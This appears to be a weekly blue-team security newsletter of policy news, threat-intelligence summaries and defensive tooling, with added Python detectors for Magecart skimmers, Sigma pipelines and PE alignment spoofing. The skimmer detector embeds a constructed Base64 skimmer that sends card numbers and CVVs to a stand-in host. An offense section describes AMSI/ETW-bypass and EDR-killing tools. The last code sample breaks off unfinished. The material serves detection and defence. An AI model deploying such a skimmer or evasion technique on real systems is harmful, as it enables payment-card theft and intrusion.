

Cyber Defence Analysis for Blue & Purple Teams
Welcome to the weekly highlights and analysis of the blueteamsec subreddit (and my wider reading). Not everything makes it in, but the best bits do.
Operationally this week has mostly been centred around the at-scale exploitation of MOVEit and the resulting consequences. I commented to someone that it shouldn’t be a surprise that such vulnerabilities can be found and exploited by organized crime in 2023 when you see what a small offensive team in the private sector is capable of.
In the high-level this week:
Trump White House Aides Subpoenaed in Firing of Election Security Expert - The investigators appear focused on Mr. Trump’s state of mind around the firing of Mr. Krebs.
Twenty-Five Years of White House Cyber Policies - The incentives that the market provides are the first choice for addressing the problem of critical infrastructure protection; regulation will be used only in the face of a material failure of the market to protect the health, safety or well-being of the American people.
Netherlands government wants to abandon key safeguards for hacking of non-targets - In the new situation, hacking, targeted interception and data access operations get an automatic extension beyond the actual target of the warrant. If a warrant is requested to intercept the communications of a specific hacking organization, the warrant now also extends to victims of this hacking group.
The United States and Ukraine met on June 1, 2023, in Tallinn, Estonia to reconvene the U.S.-Ukraine Cyber Dialogue, an annual discussion on cyber policy issues - the United States is working with Congress to deliver an additional $37 million in cyber assistance to Ukraine, which would bring the total to $82 million since February 2022, and over $120 million since 2016.
China is colonising Africa’s internet - Afrinic currently has no CEO and is unable to constitute a board. Its bank accounts are frozen, and its staff are currently being paid through an emergency fund set up by the other regional internet registries… the collapse is due almost entirely to a Hong Kong businessman who found and exploited weaknesses in the organisation and who, observers fear, has the support of the Chinese government.
The (French) Senate gives the green light to the remote activation of the cameras or microphones of telephones - a provision of the justice bill authorizing the remote triggering of telephone cameras or microphones in certain investigations, without the knowledge of the persons concerned.
Cross-border access (EU) to electronic evidence - During the June plenary session, the Parliament is expected to vote on the trilogue agreement reached with the Council on two Commission proposals revolutionising cross-border access to electronic evidence across the EU
NATO Review - NATO and strategic competition in cyberspace - One avenue for NATO to pursue is to strengthen and redefine its international partnerships in this policy field. While there is more talk of the partners in the Indo-Pacific region (Japan, South Korea, Australia and New Zealand) in NATO’s Strategic Concept, there are opportunities to further develop these as global partnerships for cybersecurity.
Revising Public-Private Collaboration to Protect U.S. Critical Infrastructure - makes 12 recommendations, one of which is really easy to say - Identify a more effective way to catalog, support, and protect priority infrastructure. - but hard to do in practice.
U.S. and ROK Agencies Cybersecurity Alert: The Democratic People’s Republic of Korea (DPRK) Social Engineering Campaigns Targeting Think Tanks, Academia, and News Media - Kimsuky, a set of DPRK cyber actors, conducts large-scale social engineering campaigns in which victims at think tanks, academic institutions, and news outlets are manipulated and compromised for the purpose of intelligence gathering.
Treasury Sanctions Iranian Company Aiding in Internet Censorship - the Iran-based technology company known as “Arvan Cloud,” two senior employees of Arvan Cloud, and an affiliated company based in the United Arab Emirates for their roles in facilitating the Iranian regime’s censorship of the Internet in Iran.
A Confession Exposes India’s Secret Hacking Industry - The hacking-for-hire business has prospered in India for some of the same reasons that I.T. outsourcing has: an abundance of inexpensive skilled labor in an open marketplace readily accessible to Western clients. But Indian hackers are also unusually brazen, with competing firms publicly touting “ethical” or “white hat” hacking services, and individual hackers bragging on LinkedIn about their spear phishing.
$35 Million Atomic Wallet Hacker Funnels Crypto to North Korea’s Favored Mixer - traced funds from the $35 million Atomic Wallet hack to Sinbad.io, a mixer used to launder over $100 million in cryptoassets stolen by North Korea’s Lazarus Group.
Secure by Design – a new way to manage cyber risk in capabilities - by Christine Maxwell who is the Director for Cyber at the UK’s Ministry of Defence.
Japan targeted by Chinese propaganda and covert online campaign - The Chinese Communist Party is ramping up a multi-year propaganda and covert social media campaign focusing on Japan’s plans to release wastewater from the earthquake-stricken Fukushima Daiichi nuclear power plant
All Quiet on the Cyber Front? Explaining Russia’s Limited Cyber Effects - Zhora suggested that some key Russian accesses to Ukrainian networks were compromised before the February 2022 invasion. This denied Russia the ability to leverage these to deliver cyber operations. - in short Hunt Forward worked.
UK’s CDEI portfolio of AI assurance techniques - The portfolio is useful for anybody involved in designing, developing, deploying or procuring AI-enabled systems, and showcases examples of AI assurance techniques being used in the real-world to support the development of trustworthy AI - notable cyber gap.
Singapore launches AI Verify Foundation to shape the future of international AI standards through collaboration - The Foundation will look to boost AI testing capabilities and assurance to meet the needs of companies and regulators globally.
The reflections this week come from considering what the future holds for cyber resilience, at national levels all the way down to the technological. It is increasingly clear we will continue to have breaches of all sizes and impacts no matter what we do. That is, we might reduce their likelihood, but we can’t and won’t stop them, for a variety of increasingly complex reasons. The net result, I suggested, is that there is significant value in ‘blast radius minimization’. If we assume breach (as we have for a while), how do we minimize the possible impact? Arguably Zero Trust is a nod to this by removing the implied trust of an ‘internal’ network. But there is clearly massive opportunity here to do a whole lot more…
On the interesting job/role front:
UK Department for Science, Innovation and Technology Secondee Opportunities - includes the cyber directorate
Defence Digital – Cyber Security Awareness Deputy Head at the UK’s MoD
Deputy Director, Strategic Analysis and Assurance at the UK’s Department for Science, Innovation and Technology
Head of the Digital Pound Project - at the UK’s Bank of England
Software Security Researcher - Browser & Userland - Apple in the UK
Have a lovely Friday
Ollie
Cyber threat intelligence
Who is doing what to whom and how.
Russia
UAC-0099: cyberespionage against state organizations and media representatives of Ukraine
Reporting from Ukraine on Russian state-aligned activity: a stealer, a keylogger, and the use of TOR as an obfuscation network for remote access.
malicious programs "THUMBCHOP" (stealer for Chrome and Opera), "CLOGFLAG" (keylogger), as well as TOR and SSH can be downloaded to the affected computer to create a hidden service and/or build a reverse connection and, in this way, create the prerequisites for interactive unauthorized remote access to the computer. The incident response also uncovered samples of malware developed using the Go programming language, namely: SEAGLOW and OVERJAM
https://cert.gov.ua/article/4818341
RomCom Resurfaces: Targeting Politicians in Ukraine and U.S.-Based Healthcare Providing Aid to Refugees from Ukraine
Building on the reporting last week of this threat actor and their pivot to state aligned activity. The fact that humanitarian support is being targeted is of note.
The RomCom threat actor has been carefully following geopolitical events surrounding the war in Ukraine, targeting militaries, food supply chains, and IT companies. In RomCom’s latest campaign [we] observed RomCom targeting politicians in Ukraine who are working closely with Western countries, and a U.S.-based healthcare company providing humanitarian aid to the refugees fleeing from Ukraine and receiving medical assistance in the U.S.
https://blogs.blackberry.com/en/2023/06/romcom-resurfaces-targeting-ukraine
North Korea
I’ve omitted some of the tactical reporting this week as there was simply so much. It is all on the Subreddit if you want it.
North Korea Using Social Engineering to Enable Hacking of Think Tanks, Academia, and Media
Tell us you have/had access to the threat actors’ infrastructure without telling us.
https://www.ic3.gov/Media/News/2023/230601.pdf
North Korea-Aligned TAG-71 Spoofs Financial Institutions in Asia and US
North Korea continues to appear to be after financial instruments. The tradecraft is as you would expect, i.e. maldocs using a variety of obfuscation and exploitation techniques (e.g. template injection).
[We] discovered malicious cyber threat activity spoofing several financial institutions and venture capital firms in Japan, Vietnam, and the United States. The group responsible, referred to as Threat Activity Group 71 (TAG-71), has significant overlaps with the North Korean state-sponsored APT38. Between September 2022 and March 2023, [we] discovered 74 domains and 6 malicious files associated with TAG-71's activities.
https://www.recordedfuture.com/north-korea-aligned-tag-71-spoofs-financial-institutions
https://go.recordedfuture.com/hubfs/reports/cta-2023-0606.pdf
ITG10 Likely Targeting South Korean Entities of Interest to the Democratic People's Republic of Korea (DPRK)
Joshua Chung, Melissa Frydrych, Claire Zaboeva and Agnes Ramos-Beauchamp detail a phishing campaign like a lot of others we report on week in and week out. The point of note here is the victimology.
ITG10 likely targeting South Korean government, universities, think tanks, and dissidents
Phishing emails spoof legitimate senders to deliver RokRAT via LNK files
Email attachments mimic legitimate documents
Additional malware samples possibly related to ITG10 RokRAT campaigns
https://securityintelligence.com/posts/itg10-targeting-south-korean-entities/
Kimsuky Strikes Again | New Social Engineering Campaign Aims to Steal Credentials and Gather Strategic Intelligence
Aleksandar Milenkoski details further Hermit Kingdom activity and builds on various bits of tradecraft reporting we have covered over the last few months (years?). Noting that their reconnaissance is evolving / getting stronger.
[We have] been tracking a social engineering campaign by the North Korean APT group Kimsuky targeting experts in North Korean affairs, part of a broader campaign discussed in a recent NSA advisory.
The campaign has the objective of stealing Google and subscription credentials of a reputable news and analysis service focusing on North Korea, as well as delivering reconnaissance malware.
Kimsuky engages in extensive email correspondence and uses spoofed URLs, websites imitating legitimate web platforms, and Office documents weaponized with the ReconShark malware.
This activity indicates Kimsuky’s growing dedication to social engineering and highlights the group’s increasing interest in gathering strategic intelligence.
"Professor, please comment"... North Korean hacker organization 'Kimsuky' attempts to hack 150 security experts
Yujin Lee provides reporting on a scaled campaign by the Hermit Kingdom against those who may have policy influence towards North Korea.
The National Investigation Headquarters of the National Police Agency announced on the 7th that, after investigating the case of malicious e-mails sent to key officials in the field of diplomacy and security, it had confirmed that the campaign was carried out by a specific North Korean hacking organization.
According to the police, from April to August of last year, Kimsuky sent malicious e-mails to 150 South Korean diplomacy and security experts, inducing them to access phishing sites. They attempted a natural approach by sending e-mails asking for opinions on a booklet or thesis.
China
Chinese Threat Actor Used Modified Cobalt Strike Variant to Attack Taiwanese Critical Infrastructure
Arda Büyükkaya detailed an interesting customization to Cobalt Strike here by a Chinese threat actor in an attempt to avoid detection.
[We] identified a malicious web server very likely operated by a Chinese threat actor used to target Taiwanese government entities, including critical infrastructure.
The threat actor primarily focused on exploiting four different remote code execution (RCE) vulnerabilities to target web services and heavily relied on open-source tools, some of which are exclusively available in Chinese underground forums. The threat actor also engaged in brute-forcing against the victim's internal web services.
Malware Spotlight: Camaro Dragon’s TinyNote Backdoor
Interesting insight here into a Chinese state actor and their capability to bypass a regional EDR solution. Also of note: this kind of threat intelligence collection would not be lawful from the UK under the Computer Misuse Act, because the files were protected by HTTP basic authentication, even if the password was known.
Since early January 2023, there has been a notable surge in activity targeting European foreign affairs entities linked to Southeast and East Asia. The threat actors responsible are tracked by [us] as Camaro Dragon and are associated with a broad network of espionage operations aligned with Chinese interests. Camaro Dragon overlaps with previously reported activities conducted by state-sponsored Chinese threat actors, namely Mustang Panda.
A previously unknown Go-based backdoor called TinyNote was found on one of the Camaro Dragon distribution servers, in addition to being spotted in the wild. The malware samples also communicate with other known C&C servers attributed to Camaro Dragon.
The TinyNote backdoor is distributed with names related to foreign affairs matters, and likely targets Southeast and East Asian embassies.
The backdoor performs a bypass of the Indonesian antivirus SmadAV, a security tool popular in Southeast Asian countries, such as Myanmar and Indonesia, and apparently used by a subset of the campaign targets.
The TinyNote backdoor is a first-stage malware only capable of basic machine enumeration and command execution via PowerShell or Goroutines. However, it focuses on redundancy to gain a foothold on the infected machine, including setting up multiple persistency tasks, communication with several different C&C servers, and different types of C&C command execution.
…
When we investigated a few delivery servers related to Camaro Dragon, we discovered that one of them exposed the threat actors’ tools and files located on the server, only protected by basic HTTP Authorization with a known password.
https://research.checkpoint.com/2023/malware-spotlight-camaro-dragons-tinynote-backdoor/
Iran
Iran Cyber Threat Overview
Maxime ARQUILLIÈRE provides an overview of the Iran state threat actor nexus. Useful for those trying to orientate themselves on the topic.
This report aims at understanding and contextualising cyber malicious activities associated with Iran-nexus intrusion sets over the 2022-2023 period. It does not establish an exhaustive list of campaigns or reported intrusion sets, but rather offers a strategic analysis pertaining to the Iranian cyber threat. Information cut-off date is 5 May 2023.
https://blog.sekoia.io/iran-cyber-threat-overview/
Stealth Soldier Backdoor Used in Targeted Espionage Attacks in North Africa
Discuss: is this the Egyptian state or someone else interested in the region?
[We] observed a wave of highly-targeted espionage attacks in Libya that utilize a new custom modular backdoor.
Stealth Soldier malware is an undocumented backdoor that primarily operates surveillance functions such as file exfiltration, screen and microphone recording, keystroke logging and stealing browser information.
The Stealth Soldier infrastructure has some overlaps with the infrastructure of The Eye on the Nile, which operated against Egyptian civil society in 2019. This is the first possible re-appearance of this threat actor since then.
The newest version of the backdoor we found was Version 9, likely delivered in February 2023. The oldest version we found was Version 6, compiled in October 2022.
There are indications that the malware C&C servers are related to a larger set of domains, likely used for phishing campaigns. Some of the domains masquerade as sites belonging to the Libyan Foreign Affairs Ministry.
Analysis of SideCopy’s recent activity: FetaRAT, a new backdoor targeting Indian defence and military departments
Chinese reporting on a Pakistani threat actor who continues to target the Indian state. The fact that their tradecraft imitates that of the country they are targeting shows the real tit-for-tat nature here.
The loader samples captured this time are all hosted on the website of an Indian translation company;
The captured samples are mainly aimed at Indian defence and military;
The attack method in the initial stage of the activity is still mainly to imitate SideWinder, and a new C# backdoor Trojan is released later. We named it FetaRAT. The main functions of the backdoor include network connection, information acquisition, file upload, screenshot upload, audio playback, etc.
New Magecart-Style Campaign Abusing Legitimate Websites to Attack Others
Roman Lvovsky details a criminal campaign which is doing web skimming. The sooner we mitigate this class of threat within our financial systems arguably the better.
[We] have discovered and analyzed a new ongoing Magecart-style web skimmer campaign, designed to steal personally identifiable information (PII) and credit card information from digital commerce websites.
Victims have been identified in North America, Latin America, and Europe, and they range in size. Some victims are estimated to handle hundreds of thousands of visitors per month, potentially putting tens of thousands of shoppers’ PII and credit cards at risk of being stolen and abused or sold on the dark web.
Attackers employ a number of evasion techniques during the campaign, including Base64 obfuscation and masking the attack to resemble popular third-party services, such as Google Analytics or Google Tag Manager.
Notably, attackers “hijack” legitimate websites to act as makeshift command and control (C2) servers. These “host victims” act as distribution centers for malicious code, unbeknownst to the victim, effectively hiding the attack behind a legitimate domain.
This attack includes the potential for exploitation of websites built using Magento, WooCommerce, WordPress, and Shopify, demonstrating the growing variety of vulnerabilities and abusable digital commerce platforms.
https://www.akamai.com/blog/security-research/new-magecart-hides-behind-legit-domains
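The two evasion techniques described above (a loader that masquerades as Google Analytics / Tag Manager but is served from a hijacked host, and a Base64-obfuscated inline skimmer) are the sort of thing a checkout page can be scanned for. The following is an added example written for this newsletter, not Akamai’s code or an indicator from their report: it parses a constructed HTML page, flags analytics-lookalike scripts whose host is not one of the trusted Google hosts (an assumed allowlist you would extend for your own estate), decodes any long Base64 blobs in inline scripts and reports those that reference card fields and an exfiltration call. The hostnames and the skimmer body are made up for the sample.

```python
import base64
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: hosts that legitimately serve GA / GTM loaders. Extend for your estate.
TRUSTED_GOOGLE_HOSTS = {"www.google-analytics.com", "www.googletagmanager.com"}
GOOGLE_LOOKALIKE = re.compile(r"(gtag|gtm|analytics|googletag)", re.I)
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
CARD_FIELD = re.compile(r"(card ?number|cc_?num|cvv|cvc|expir)", re.I)
EXFIL_CALL = re.compile(r"(fetch\(|XMLHttpRequest|sendBeacon|new Image\(|\.src\s*=)", re.I)
URL_IN_TEXT = re.compile(r"https?://[^\s'\"]+")

# Constructed skimmer body (not a real sample): reads card fields, posts them to a
# "compromised" host whose URL is dressed up to look like a Tag Manager loader.
SKIMMER_SRC = (
    "var n=document.querySelector('input[name=cardnumber]').value;"
    "var c=document.querySelector('input[name=cvv]').value;"
    "fetch('https://compromised-blog.example/gtm.js?d='+btoa(n+'|'+c));"
)
SKIMMER_B64 = base64.b64encode(SKIMMER_SRC.encode()).decode()

# Constructed checkout page: one genuine GTM loader, one lookalike, one obfuscated skimmer.
SAMPLE_HTML = f"""<html><head>
<script src="https://www.googletagmanager.com/gtag/js?id=G-XXXX"></script>
<script src="https://cdn.compromised-blog.example/gtag/js?id=G-YYYY"></script>
<script>var k="{SKIMMER_B64}";eval(atob(k));</script>
<script>console.log("checkout page ready");</script>
</head><body><form><input name="cardnumber"><input name="cvv"></form></body></html>"""


class ScriptCollector(HTMLParser):
    """Collect (src, inline_body) for every <script> tag in document order."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False
        self._src = None
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self._src = dict(attrs).get("src")
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script":
            self.scripts.append((self._src, "".join(self._buf)))
            self._in_script = False


def decode_blobs(text):
    """Return the UTF-8 decodings of every long, valid Base64 run in the text."""
    decoded = []
    for match in BASE64_BLOB.finditer(text):
        try:
            decoded.append(base64.b64decode(match.group(0), validate=True).decode("utf-8"))
        except Exception:
            continue  # not really Base64 (or not text): ignore
    return decoded


def scan_html(html):
    """Return a list of findings for lookalike loaders and Base64-hidden skimmers."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src, body in collector.scripts:
        if src:
            host = urlparse(src).netloc.lower()
            if GOOGLE_LOOKALIKE.search(src) and host not in TRUSTED_GOOGLE_HOSTS:
                findings.append({"type": "lookalike_analytics_loader", "src": src, "host": host})
            continue
        for plain in decode_blobs(body):
            if CARD_FIELD.search(plain) and EXFIL_CALL.search(plain):
                findings.append({"type": "base64_skimmer", "exfil": URL_IN_TEXT.findall(plain)})
    return findings


if __name__ == "__main__":
    for finding in scan_html(SAMPLE_HTML):
        print(finding)
```

Run against the constructed page it reports the lookalike loader on cdn.compromised-blog.example and the decoded skimmer with its exfiltration URL, while the genuine googletagmanager.com loader and the harmless inline script pass. The decode step is deliberately strict (validate=True plus a UTF-8 check) so long identifiers in legitimate minified code do not produce noise.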
When hackers hack the hackers
The interesting point here is that the malware was signed with a certificate from what appears to be a legitimate Chinese electronics company. The threat intel researchers got access to the Discord server being used for C2 and thus could see all the commands executed against the victims (again, not legal to do from the UK). The fact that a malicious Visual Studio project was used for initial access is of note.
[We] had the opportunity to observe the execution of non-standard processes in a sandbox-like, isolated virtual machine (VM). Further analysis of these processes revealed Command & Control (C2) connections using Discord for communication. As we continued to analyse the C2 agent, we also gained access to the attacker's Discord channel and were able to take a look at all the commands and modules executed for many more compromised systems. This attacker/group was very different to the ones we typically see while doing Incident Response for our customers in terms of the motivation and goals. It seemed, that this attacker was mainly compromising Malware developers and or Offensive Security related people to steal and sell code from the target systems.
https://www.r-tec.net/r-tec-blog-when-hackers-hack-the-hackers.html
Android apps containing SpinOk module with spyware features installed over 421,000,000 times
This makes the mobile eco-system just sound like Mos Eisley. The scale here is of note.
Upon initialization, this trojan SDK connects to a C&C server by sending a request containing a large amount of technical information about the infected device. Included are data from sensors, e.g., gyroscope, magnetometer, etc., that can be used to detect an emulator environment and adjust the module’s operating routine in order to avoid being detected by security researchers. For the same purpose, it ignores device proxy settings, which allows it to hide network connections during analysis. In response, the module receives a list of URLs from the server, which it then opens in WebView to display advertising banners.
this trojan SDK expands the capabilities of JavaScript code executed on loaded webpages containing ads. It adds many features to such code, including the ability to:
obtain the list of files in specified directories,
verify the presence of a specified file or a directory on the device,
obtain a file from the device, and
copy or substitute the clipboard content
https://news.drweb.com/show/?i=14705&lng=en
Not your average Joe
A low grade criminal actor who has been active for 10 years!
XeGroup is a hacking group that has been active since at least 2013. The group is believed to have been involved in various cybercriminal activities. This threat actor uses many different attack techniques including:
Supply chain attacks similar to Magecart, that inject credit card skimmers into web pages.
Creating fake websites to deceive users into revealing their personal information.
Selling stolen data on the dark web.
Discovery
How we find and understand the latent compromises within our environments.
Windows.Detection.MoveIt
Matthew Green et al provide these Velociraptor artifacts to detect exploitation of the MOVEit critical vulnerability observed in the wild.
https://docs.velociraptor.app/exchange/artifacts/pages/moveit/
https://docs.velociraptor.app/exchange/artifacts/pages/moveitevtx/
DeepEAD: Explainable Anomaly Detection from System Logs
Xinda Wang, Kyeong Jin Kim, Ye Wang, Toshiaki Koike-Akino, and Kieran Parsons present some promising research here to detect high signal anomalies.
In this paper, we develop an attention-equipped encoder-decoder system to capture context from system logs for explainable anomaly detection. For each target event, we collect its nearby events in chronological order as its context events. Instead of using a recurrent neural network-based encoder like previous works, we adopt a Transformer-based encoder to extract complex relations among context events and their attributes.
Evaluation on the large-scale real-world Los Alamos National Laboratory dataset shows that, compared with existing works, our methods can provide fine-grained one-to-one attention to help explain the importance of each attribute in the context events to the prediction, without sacrificing detection performance.
https://merl.com/publications/docs/TR2023-050.pdf
Upping the Ante: Detecting In-Memory Threats with Kernel Call Stacks
Joe Desimone, Samir Bousseaden and Gabriel Landau continue to up the Windows detection tradecraft game.
Call stacks are a powerful data source that can be used to improve protection against non-memory-based threats as well. For example [our] queries look for the creation of a child process or an executable file extension from an Office process with a call stack containing VBE7.dll (a strong sign of the presence of a macro-enabled document). This increases the signal and coverage of the rule logic while reducing the necessary tuning efforts compared to just process or file creation events with no call stack information.
Defence
How we proactively defend our environments.
Connecting Sigma Rule Sets to your Environment with Processing Pipelines
Thomas Patzke brings some exquisite engineering to the detection problem space.
A processing pipeline defines a sequence of transformations that are applied to a Sigma rule before it is converted into the target query language. These transformations can be field mappings, adding suffixes to field names and many others. In addition, conditions can be attached to a transformation. E.g. a transformation can only be applied for particular fields or if a former transformation was applied. A transformation with its conditions and an optional identifier together form a processing item.
Processing pipelines can be expressed by a YAML file or as Python code.
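To make the transformation / condition / processing item structure concrete, here is an added, self-contained Python model of that concept. It is written for this newsletter and is not pySigma’s API or code (pySigma ships its own classes and a YAML loader; the names below only echo the vocabulary in the quoted paragraph). The rule format, the ECS-style target field names and the one-line "backend" that AND-joins the detection into a query are all assumptions made for the illustration.

```python
from dataclasses import dataclass, field


@dataclass
class Rule:
    """Stripped-down Sigma rule: a logsource and a flat field -> value detection."""
    logsource: dict
    detection: dict
    applied_items: set = field(default_factory=set)  # identifiers of items that ran


# --- conditions: decide whether an item applies to a rule / to a field name -------
class LogsourceCondition:
    def __init__(self, **expected):
        self.expected = expected

    def match(self, rule):
        return all(rule.logsource.get(k) == v for k, v in self.expected.items())


class ProcessingItemAppliedCondition:
    """True only if an earlier item with the given identifier already ran on the rule."""
    def __init__(self, item_id):
        self.item_id = item_id

    def match(self, rule):
        return self.item_id in rule.applied_items


class IncludeFieldsCondition:
    def __init__(self, fields):
        self.fields = set(fields)

    def match_field(self, name):
        return name in self.fields


# --- transformations: rewrite the rule in place ------------------------------------
class FieldNameMapping:
    def __init__(self, mapping):
        self.mapping = mapping

    def apply(self, rule, field_ok):
        rule.detection = {(self.mapping.get(f, f) if field_ok(f) else f): v
                          for f, v in rule.detection.items()}


class AddFieldnameSuffix:
    def __init__(self, suffix):
        self.suffix = suffix

    def apply(self, rule, field_ok):
        rule.detection = {(f + self.suffix if field_ok(f) else f): v
                          for f, v in rule.detection.items()}


@dataclass
class ProcessingItem:
    """Transformation + its conditions + an identifier (the unit described in the post)."""
    identifier: str
    transformation: object
    rule_conditions: list = field(default_factory=list)
    field_name_conditions: list = field(default_factory=list)

    def apply(self, rule):
        if not all(c.match(rule) for c in self.rule_conditions):
            return False
        field_ok = lambda name: all(c.match_field(name) for c in self.field_name_conditions)
        self.transformation.apply(rule, field_ok)
        rule.applied_items.add(self.identifier)
        return True


class ProcessingPipeline:
    def __init__(self, items):
        self.items = items

    def apply(self, rule):
        for item in self.items:
            item.apply(rule)
        return rule


def to_query(rule):
    """Toy backend (assumption): AND-join the detection as key="value" terms."""
    return " AND ".join(f'{f}="{v}"' for f, v in rule.detection.items())


# Assumed pipeline: map Sysmon-style fields to ECS-style names for Windows process
# creation only, then add ".keyword" to process.executable, but only if the mapping ran.
PIPELINE = ProcessingPipeline([
    ProcessingItem("ecs_process_fields",
                   FieldNameMapping({"Image": "process.executable",
                                     "CommandLine": "process.command_line"}),
                   rule_conditions=[LogsourceCondition(product="windows",
                                                       category="process_creation")]),
    ProcessingItem("keyword_suffix",
                   AddFieldnameSuffix(".keyword"),
                   rule_conditions=[ProcessingItemAppliedCondition("ecs_process_fields")],
                   field_name_conditions=[IncludeFieldsCondition(["process.executable"])]),
])


def convert(rule):
    return to_query(PIPELINE.apply(rule))


if __name__ == "__main__":
    print(convert(Rule({"product": "windows", "category": "process_creation"},
                       {"Image": "whoami.exe", "CommandLine": "whoami /all"})))
```

A Windows process-creation rule comes out with both fields renamed and only process.executable suffixed; a Linux rule with the same detection passes through untouched because the first item’s logsource condition fails and the second item is chained to it through the applied-item condition.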
EnableWindowsLogSettings
This is older, but we had not covered it and doing so is worthwhile. It is documentation and scripts to properly enable Windows event logs.
https://github.com/Yamato-Security/EnableWindowsLogSettings
Vulnerability
Our attack surface.
Supply Chain Risk from Gigabyte App Center Backdoor
This was pretty material as an attack surface.
[We] detected firmware on Gigabyte systems that drops an executable Windows binary that is executed during the Windows startup process.
This executable binary insecurely downloads and executes additional payloads from the Internet.
https://eclypsium.com/blog/supply-chain-risk-from-gigabyte-app-center-backdoor/
The Unseen Risks of Open Source Dependencies: The Case of an Abandoned Name
The fragility of the eco-system, coupled with a world of M&A and other company lifecycle events, makes such incidents, by both opportunistic and persistent threat actors, a real risk.
‘gemnasium-gitlab-service‘ was one such gem, originally developed by Gemnasium and taken over and maintained by GitLab when they acquired Gemnasium. However, GitLab decided to retire this gem a while ago and move away from its usage in the GitLab software.
Normally, such a decision would not cause any significant issues. Developers relying on the gem would either stick with the last available version or migrate to an alternative over time.
However, in the case of ‘gemnasium-gitlab-service‘, our research team discovered an unidentified entity scanning registries and code sources for references to packages that had names available for takeover in various registries.
The threat actor noticed that this gem had been removed and took the opportunity to take over the gem’s name. This person or group then published a new gem under the ‘gemnasium-gitlab-service‘ title.
Offense
Attack capability, techniques and trade-craft.
LightsOut
Matthew David releases tooling which generates an obfuscated DLL that will disable AMSI & ETW. In use by threat actors in 3..2..
LightsOut will generate an obfuscated DLL that will disable AMSI & ETW while trying to evade AV. This is done by randomizing all WinAPI functions used, xor encoding strings, and utilizing basic sandbox checks. Mingw-w64 is used to compile the obfuscated C code into a DLL that can be loaded into any process where AMSI or ETW are present (i.e. PowerShell).
https://github.com/icyguider/LightsOut
MFA Bombing Tools for Okta
Avi Aminov et al release a tool to highlight the need for their solution. Content led marketing at its finest..
MFA Bomber: [Red Team] This tool bombards a user with MFA push prompts until the user approves one of them. The tool works with Okta and requires a valid username and password.
MFA Bombing Tester: [Purple Team] This tool scans an Okta organization for all users with push MFA prompts configured and triggers them to see who approves. The tool interacts with the Okta API using a token, so it doesn't require a Chrome driver to function.
https://github.com/authomize/mfa-bombing
ZipJar, a little bit unexpected attack chain
The prophecy comes sort of true from the launch of the .zip gTLD.
The Windows Explorer location bar is also a search function
If using a TLD, like .zip, the search will be online, if the file does not exist locally on PATH folders
Windows Explorer will happily map a WebDAV folder directly
.jar files circumvent the execution Blocker (untrusted Location), however a JRE must be installed
https://badoption.eu/blog/2023/06/01/zipjar.html
OneDrive to Enum Them All
A technique detailed which means hopefully you weren’t relying on the secrecy of usernames as your defense in depth.
In short, OneDrive can be the best way to do user enumeration because:
It doesn’t require a login attempt
It’s completely silent (companies cannot see the requests)
There’s no rate-limiting
https://www.trustedsec.com/blog/onedrive-to-enum-them-all/
Terminator: Reproducing Spyboy technique to terminate all EDR/XDR/AVs processes
A Moroccan researcher has released as open source a capability which replicates what was being sold on the criminal underground.
Reproducing Spyboy technique, which involves terminating all EDR/XDR/AVs processes by abusing the zam64.sys driver
Spyboy was selling the Terminator software at a price of $3,000
the sample is sourced from loldrivers
https://github.com/ZeroMemoryEx/Terminator
Abusing undocumented features to spoof PE section headers
Matthew continues to inspire with his releases. This edge-case behaviour we can expect to be adopted.
Some time ago, I accidentally came across some interesting behaviour in PE files while debugging an unrelated project. I noticed that setting the SectionAlignment value in the NT header to a value lower than the page size (4096) resulted in significant differences in the way that the image is mapped into memory. Rather than following the usual procedure of parsing the section table to construct the image in memory, the loader appeared to map the entire file, including the headers, into memory with read-write-execute (RWX) permissions - the individual section headers were completely ignored.
https://secret.club/2023/06/05/spoof-pe-sections.html
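Since the trigger is a single Optional Header value, a triage check for it is cheap. The following is an added example written for this newsletter, not code from the secret.club post: it reads SectionAlignment and FileAlignment from a PE (at offsets 32 and 36 of the Optional Header, the same position for PE32 and PE32+), flags a SectionAlignment below the 4096-byte page size, and also checks the PE specification’s rule that when SectionAlignment is below the page size, FileAlignment must equal it. The build_minimal_pe helper constructs a header-only PE purely as test input; it is not a loadable binary.

```python
import struct

PAGE_SIZE = 0x1000
PE32, PE32PLUS = 0x10B, 0x20B


def build_minimal_pe(section_alignment, file_alignment, pe32plus=False):
    """Constructed test input: DOS stub + PE signature + COFF + Optional Header only."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # Optional Header: Magic(2) then 30 bytes of linker/size/entry/base fields, so
    # SectionAlignment sits at +32 and FileAlignment at +36 for both PE32 and PE32+.
    opt = struct.pack("<H", PE32PLUS if pe32plus else PE32)
    opt += b"\0" * 30
    opt += struct.pack("<II", section_alignment, file_alignment)
    opt += b"\0" * 40  # remaining fields are not parsed by this check
    coff = struct.pack("<HHIIIHH",
                       0x8664 if pe32plus else 0x14C,  # Machine
                       1,                                # NumberOfSections
                       0, 0, 0,                          # timestamp, symtab ptr, nsyms
                       len(opt),                         # SizeOfOptionalHeader
                       0x0002)                           # Characteristics: executable
    return dos + b"PE\0\0" + coff + opt


def read_alignment(data):
    """Return (magic, SectionAlignment, FileAlignment); raise ValueError if not a PE."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE file")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    opt_off = e_lfanew + 4 + 20  # skip signature and the 20-byte COFF header
    (magic,) = struct.unpack_from("<H", data, opt_off)
    if magic not in (PE32, PE32PLUS):
        raise ValueError("unknown Optional Header magic 0x%x" % magic)
    section_alignment, file_alignment = struct.unpack_from("<II", data, opt_off + 32)
    return magic, section_alignment, file_alignment


def assess(data):
    """Flag the low-SectionAlignment mapping mode the post describes."""
    magic, sa, fa = read_alignment(data)
    return {
        "pe32plus": magic == PE32PLUS,
        "section_alignment": sa,
        "file_alignment": fa,
        # below the page size the loader maps the raw file instead of building sections
        "low_alignment": sa < PAGE_SIZE,
        # PE spec: if SectionAlignment < page size then FileAlignment must equal it
        "spec_consistent": sa >= PAGE_SIZE or sa == fa,
    }


if __name__ == "__main__":
    import sys
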